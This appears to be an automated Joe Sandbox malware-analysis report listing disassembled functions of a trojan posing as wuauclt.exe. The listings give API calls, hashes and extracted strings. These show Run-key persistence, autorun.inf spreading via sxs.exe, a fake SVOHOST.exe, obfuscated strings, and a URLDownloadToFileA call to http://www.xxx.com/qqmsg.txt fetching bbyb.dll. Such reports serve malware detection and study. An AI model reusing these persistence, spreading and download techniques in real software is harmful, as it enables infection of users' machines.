                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                            • String ID:
                                                                            • API String ID: 1694776339-0
                                                                            • Opcode ID: 853191b5a63ddb20695847c52630ab1a0d0f08debd7bc4a84206ca039e1fbc7e
                                                                            • Instruction ID: c08e0bc1a52ce57edfd428ff71f0c6be874f716b93af5554cff537b7abe3d1e7
                                                                            • Opcode Fuzzy Hash: 853191b5a63ddb20695847c52630ab1a0d0f08debd7bc4a84206ca039e1fbc7e
                                                                            • Instruction Fuzzy Hash: 1441A2706007009AE731AF288A0D76375D4FB44754F20CA3FE0D6B66E1EAFD98859B5D
                                                                            Function 02311A60 Relevance: 13.6, APIs: 9, Instructions: 135memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 02311AA2
                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 02311AAC
                                                                            • K32EnumProcesses.KERNEL32(00000000,00001000,00000000), ref: 02311ACF
                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 02311B1F
                                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 02311B23
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02311B90
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02311B98
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02311BA2
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02311BB4
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000003.2180435124.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: true
                                                                            • Associated: 0000002A.00000003.2171747503.0000000002310000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_3_2310000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Free$Alloc$ChangeCloseEnumFileFindModuleNameNotificationProcesses
                                                                            • String ID:
                                                                            • API String ID: 3259292083-0
                                                                            • Opcode ID: 924fc3e4dd7aed06a335e5ee07ce167f7b38cd591f8e6216f861cd618606b93a
                                                                            • Instruction ID: 220a75495074db4dc2e65ff22125ded4b1d3b822ed5e83cdbd26ed3284ce666a
                                                                            • Opcode Fuzzy Hash: 924fc3e4dd7aed06a335e5ee07ce167f7b38cd591f8e6216f861cd618606b93a
                                                                            • Instruction Fuzzy Hash: 23413E75A00218AFDB249F99CC84FEFBBB9EF48754F108065FA49A7290D774DA41CB60
                                                                            Function 00406728 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00404F84: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00404F97
                                                                              • Part of subcall function 00402728: GetSystemTime.KERNEL32(?), ref: 00402732
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 004067D0
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 0040681F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteShellSystem$DirectoryTime
                                                                            • String ID: A}vokwcq*`~f$SVOHOST.exe$kucm$lqrs>*)tsr(gra`lvjhf*fin$lqrs>*)tsr(lj``lvapg*fin
                                                                            • API String ID: 3953870399-2285911871
                                                                            • Opcode ID: 7d1bfde01e10ecbf3750342708e0987b8c15c001d9b85cf4944c029710ffcb01
                                                                            • Instruction ID: 0ed2c2afb193c78c9d8b93d9018a26212a72780c50695523a22b01571590cbab
                                                                            • Opcode Fuzzy Hash: 7d1bfde01e10ecbf3750342708e0987b8c15c001d9b85cf4944c029710ffcb01
                                                                            • Instruction Fuzzy Hash: B7215171601109ABD701FB95D842A9F77BDDF84708F51813BB901BB2C2DABC9E1086A9
                                                                            Function 00408A14 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74windowtimeregistryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 00408A4E
                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00408A5D
                                                                            • RegisterClassA.USER32(0042AE18), ref: 00408A7A
                                                                              • Part of subcall function 00404414: CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            • SetTimer.USER32(00000000,00000001,000005DC,004084C8), ref: 00408AD0
                                                                            • TranslateMessage.USER32(0042AE44), ref: 00408AE0
                                                                            • DispatchMessageA.USER32(0042AE44), ref: 00408AE6
                                                                            • GetMessageA.USER32(0042AE44,00000000,00000000,00000000), ref: 00408AF2
                                                                            • KillTimer.USER32(00000000,00007F51,0042AE44,00000000,00000000,00000000,?,?,00408D8D,00000000,00000000,00000000,00000000,00400000,00000000,00000104), ref: 00408B0B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Message$LoadTimer$ClassCreateCursorDispatchIconKillRegisterTranslateWindow
                                                                            • String ID: bbyb
                                                                            • API String ID: 638683977-2792963345
                                                                            • Opcode ID: 10646b1b30f831aae2ba82a84725ad5e78f7cae3c9c1bad9cc75a6da08a812fc
                                                                            • Instruction ID: 594542fb2c8cde3af6a4fe5998d0340eb89294e9bd4d21e9ef299eea2d4a1429
                                                                            • Opcode Fuzzy Hash: 10646b1b30f831aae2ba82a84725ad5e78f7cae3c9c1bad9cc75a6da08a812fc
                                                                            • Instruction Fuzzy Hash: DF2127B0784701AFE720DF649D82B1237E4AB44700F10853AFA85EF6D2DBB8A8118B5D
                                                                            Function 00403854 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error 5 at 00407309,0000001E,?,00000000,?,00403922,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000), ref: 0040388D
                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error 5 at 00407309,0000001E,?,00000000,?,00403922,?,?,?,00000002,004039C2,00402507,0040254F,00000005), ref: 00403893
                                                                            • GetStdHandle.KERNEL32(000000F5,004038DC,00000002,?,00000000,00000000,000000F5,Runtime error 5 at 00407309,0000001E,?,00000000,?,00403922), ref: 004038A8
                                                                            • WriteFile.KERNEL32(00000000,000000F5,004038DC,00000002,?,00000000,00000000,000000F5,Runtime error 5 at 00407309,0000001E,?,00000000,?,00403922), ref: 004038AE
                                                                            • MessageBoxA.USER32(00000000,Runtime error 5 at 00407309,Error,00000000), ref: 004038CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandleWrite$Message
                                                                            • String ID: Error$Runtime error 5 at 00407309
                                                                            • API String ID: 1570097196-1709220029
                                                                            • Opcode ID: 137e7e66d52ddb4f1bae12f1eb9e43931729fc44793f38aa38c8e49f2c636fe0
                                                                            • Instruction ID: 73fe0ec3fb90fb3f474716323d8876418e50ff0bdbf46fc0c8a6d106d48d8078
                                                                            • Opcode Fuzzy Hash: 137e7e66d52ddb4f1bae12f1eb9e43931729fc44793f38aa38c8e49f2c636fe0
                                                                            • Instruction Fuzzy Hash: 89F09662A8434478E73077615D06F56369C5744F16F20C6BFB260745F2C6BC89C4831E
                                                                            Function 00406333 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004063BF
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406420
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406440
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile$DriveType
                                                                            • String ID: \autorun.inf$\sxs.exe$sxs.
                                                                            • API String ID: 1467228633-3893248116
                                                                            • Opcode ID: 71adc7361951f8c7509ea25619efebed4a0e59db825d7e1aa74bc3a9cd434a40
                                                                            • Instruction ID: d7b3d59c00894bd143ef4d30449a3bd145d8bcc858247ddb54af4904dd4dc33d
                                                                            • Opcode Fuzzy Hash: 71adc7361951f8c7509ea25619efebed4a0e59db825d7e1aa74bc3a9cd434a40
                                                                            • Instruction Fuzzy Hash: 4F31D4709002099BDB00FB50C952A9EBB79EF55308F514477E501B72D2C73DAF15C799
                                                                            Function 004080C8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64filenetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 0040810F
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,0040819E,?,00000000,00000000,?,004084B1,?,00000000,?,004084C7,000493E0), ref: 00408132
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00408168
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 0040817E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$CacheEntryFile$DirectoryDownloadWindows
                                                                            • String ID: bbyb.dll$http://www.xxx.com/qqmsg.txt
                                                                            • API String ID: 2436712417-1998065829
                                                                            • Opcode ID: 3ddb6b2395be871ddeea2fb3607101ab18d3a0cfe0804a7c7e3355ca6e5b914b
                                                                            • Instruction ID: fb79d00d57ea562a78b15d8b1474b2916bd554e92aef79f5ae6ec560df59828f
                                                                            • Opcode Fuzzy Hash: 3ddb6b2395be871ddeea2fb3607101ab18d3a0cfe0804a7c7e3355ca6e5b914b
                                                                            • Instruction Fuzzy Hash: DF11FC70614204AFD700FB65CE42B9A7BBDEF45705F50407AF944BB6E2CB78AE058A6C
                                                                            Function 00407DC8 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 68sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(000DBBA0,00000000,00407EA2,?,00000000,00000000,00000000,00000000), ref: 00407DEC
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                              • Part of subcall function 00404C18: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
                                                                              • Part of subcall function 00404C18: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
                                                                              • Part of subcall function 004068D0: InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
                                                                            Strings
                                                                            • wuauclt.exe, xrefs: 00407DFC
                                                                            • Microsoft, xrefs: 00407E11
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407E16
                                                                            • l}+2, xrefs: 00407E36
                                                                            • Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407E4C
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValue$ConnectedDirectoryInternetQuerySleepStateWindows
                                                                            • String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
                                                                            • API String ID: 1219844470-3788782062
                                                                            • Opcode ID: 6665439d985228bc3137df265ac3c46a918ea1d5a36fa6834cb45f0f9932f8f6
                                                                            • Instruction ID: d9744ce1b4bbba914fbef4a0fdf434069bd0e944c21e36a7c6e37f089c0d93f6
                                                                            • Opcode Fuzzy Hash: 6665439d985228bc3137df265ac3c46a918ea1d5a36fa6834cb45f0f9932f8f6
                                                                            • Instruction Fuzzy Hash: C321A1B06152046FD701FBA5D95399E7BA8EF81304F5080BBB500B72D2CBB8BE0086A9
                                                                            Function 00407DD0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 63sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(000DBBA0,00000000,00407EA2,?,00000000,00000000,00000000,00000000), ref: 00407DEC
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                              • Part of subcall function 00404C18: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
                                                                              • Part of subcall function 00404C18: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
                                                                              • Part of subcall function 004068D0: InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
                                                                            Strings
                                                                            • wuauclt.exe, xrefs: 00407DFC
                                                                            • Microsoft, xrefs: 00407E11
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407E16
                                                                            • l}+2, xrefs: 00407E36
                                                                            • Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407E4C
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValue$ConnectedDirectoryInternetQuerySleepStateWindows
                                                                            • String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
                                                                            • API String ID: 1219844470-3788782062
                                                                            • Opcode ID: ce5862bb30728e459670669a0c2fd2858caca85aa9105a01635d79dbd92c1f40
                                                                            • Instruction ID: 3575f48fa22139c18a4af409e614c0b40dd6271191b82a0b2a34aed62443784d
                                                                            • Opcode Fuzzy Hash: ce5862bb30728e459670669a0c2fd2858caca85aa9105a01635d79dbd92c1f40
                                                                            • Instruction Fuzzy Hash: 1C1142B0A15104ABD705FB95D95399E77A9EB84304F5084BBB500B72D2DBBCBE0086AD
                                                                            Function 0040187C Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 004018A9
                                                                            • LocalFree.KERNEL32(00000000,00000000,00401952), ref: 004018BB
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401952), ref: 004018DA
                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401952), ref: 00401919
                                                                            • RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 00401942
                                                                            • RtlDeleteCriticalSection.NTDLL(0040A5B0), ref: 0040194C
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                            • String ID:
                                                                            • API String ID: 3782394904-0
                                                                            • Opcode ID: 1e6658f3a1c7c09b26b832841b6dc3e54d0db2190f45ee9201c8f0ac4b0f75cc
                                                                            • Instruction ID: 59a79e90b1042c7fa72c1bdd4368158aee1beb707aa836db6f4ae4b0191b2b59
                                                                            • Opcode Fuzzy Hash: 1e6658f3a1c7c09b26b832841b6dc3e54d0db2190f45ee9201c8f0ac4b0f75cc
                                                                            • Instruction Fuzzy Hash: 171160B1604340AEE715AB659D92F1337A8B74A708F14843BF200BA6F2D67D98A0D71E
                                                                            Function 00407F54 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 56sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(001B7740,00000000,00408012,?,00000000,00000000,00000000), ref: 00407F70
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                              • Part of subcall function 00406708: InternetGetConnectedState.WININET(?,00000000), ref: 00406717
                                                                            Strings
                                                                            • Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407F95
                                                                            • l}+2, xrefs: 00407F7F
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407FD9
                                                                            • wuauclt.exe, xrefs: 00407FBF
                                                                            • Microsoft, xrefs: 00407FD4
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseConnectedDirectoryInternetSleepStateValueWindows
                                                                            • String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
                                                                            • API String ID: 3088811538-3788782062
                                                                            • Opcode ID: 2bd880a330ccf7098cd0f064fbb41e6f7692dc24caeb265b28b5c7e1db9d23fc
                                                                            • Instruction ID: 026fbd7338b316a051164a3f2916be19fdbad90e0342d7335669e4ba070194ba
                                                                            • Opcode Fuzzy Hash: 2bd880a330ccf7098cd0f064fbb41e6f7692dc24caeb265b28b5c7e1db9d23fc
                                                                            • Instruction Fuzzy Hash: 8F112170740204ABE701BAA5D913B5D77A8DB84708F61807FF540BB2D2CFBD9E04966D
                                                                            Function 0043834B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004383ED
                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 00438509
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$FreeProtect
                                                                            • String ID: @O:r
                                                                            • API String ID: 2581862158-1513391029
                                                                            • Opcode ID: 62998878eee791b55a4525ffa1200409ee62ec3c0713ca06769709f58399dcba
                                                                            • Instruction ID: 1c248bd57497abf13f7211ff5bbec31fcd2e4003a81eef7960cbaa05da7696eb
                                                                            • Opcode Fuzzy Hash: 62998878eee791b55a4525ffa1200409ee62ec3c0713ca06769709f58399dcba
                                                                            • Instruction Fuzzy Hash: D25139322043169FE7258B18CC907E6F7A1EF99314F38506EF9498B781EB79AC42CB54
                                                                            Function 02330000 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,0000116C,00001000,00000004), ref: 023300A2
                                                                            Strings
                                                                            Memory Dump Source
